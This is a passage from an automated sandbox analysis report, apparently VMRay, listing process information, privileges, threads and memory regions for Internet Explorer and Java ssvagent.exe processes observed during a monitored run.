Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:47, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:37
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xbcc
Parent PID 0x7e8 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B6C
0x B7C
0x B78
0x B74
0x B64
0x B68
0x B94
0x B70
0x B60
0x 224
0x 500
0x 32C
0x 4AC
0x 614
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x002eefff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f0fff Pagefile Backed Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00300000 0x0031efff Memory Mapped File Readable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x00331fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x004adfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000004b0000 0x004b0000 0x004b1fff Pagefile Backed Memory Readable True False False -
index.dat 0x004c0000 0x004cffff Memory Mapped File Readable, Writable True False False -
index.dat 0x004d0000 0x004d7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x004e0000 0x004effff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000004f0000 0x004f0000 0x004f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000500000 0x00500000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000570000 0x00570000 0x00571fff Private Memory Readable, Writable True False False -
private_0x0000000000580000 0x00580000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000660000 0x00660000 0x0069ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x008bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008c0000 0x008c0000 0x00a47fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a50000 0x00a50000 0x00bd0fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x00be0000 0x00eaefff Memory Mapped File Readable False False False -
private_0x0000000000f20000 0x00f20000 0x00f5ffff Private Memory Readable, Writable True False False -
private_0x0000000000f60000 0x00f60000 0x0105ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x010c0000 0x01165fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001170000 0x01170000 0x0256ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002590000 0x02590000 0x025cffff Private Memory Readable, Writable True False False -
private_0x0000000002600000 0x02600000 0x026fffff Private Memory Readable, Writable True False False -
private_0x0000000002750000 0x02750000 0x0278ffff Private Memory Readable, Writable True False False -
private_0x0000000002790000 0x02790000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x02a2ffff Private Memory Readable, Writable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02bdffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02e7ffff Private Memory Readable, Writable True False False -
private_0x0000000002f90000 0x02f90000 0x02fcffff Private Memory Readable, Writable True False False -
private_0x0000000003060000 0x03060000 0x0315ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003160000 0x03160000 0x03552fff Pagefile Backed Memory Readable True False False -
private_0x00000000035b0000 0x035b0000 0x036affff Private Memory Readable, Writable True False False -
private_0x0000000003760000 0x03760000 0x0385ffff Private Memory Readable, Writable True False False -
private_0x0000000003990000 0x03990000 0x0399ffff Private Memory Readable, Writable True False False -
private_0x0000000003a50000 0x03a50000 0x03a8ffff Private Memory Readable, Writable True False False -
staticcache.dat 0x03a90000 0x043bffff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x73110000 0x73b8ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x74390000 0x7441dfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74650000 0x746d3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x746e0000 0x74782fff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x74a00000 0x74a2afff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x74ba0000 0x74c94fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75520000 0x7556bfff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x75790000 0x757a0fff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x757a0000 0x757d2fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x757b0000 0x757ddfff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x757e0000 0x75814fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75c00000 0x75c26fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75c30000 0x75dccfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x767f0000 0x7686afff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x76870000 0x76881fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in flog.txt.
Process #20: ssvagent.exe
0 0
»
Information Value
ID #20
File Name c:\progra~2\java\jre7\bin\ssvagent.exe
Command Line "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:48, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:36
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x394
Parent PID 0xbcc (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 748
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x0041ffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
private_0x0000000000a20000 0x00a20000 0x00a5ffff Private Memory Readable, Writable True False False -
private_0x0000000000ae0000 0x00ae0000 0x00aeffff Private Memory Readable, Writable True False False -
ssvagent.exe 0x00c90000 0x00c9cfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x0209ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x020a0000 0x0236efff Memory Mapped File Readable False False False -
deploy.dll 0x71d30000 0x71d8afff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x71df0000 0x71eaefff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x74b70000 0x74b9dfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image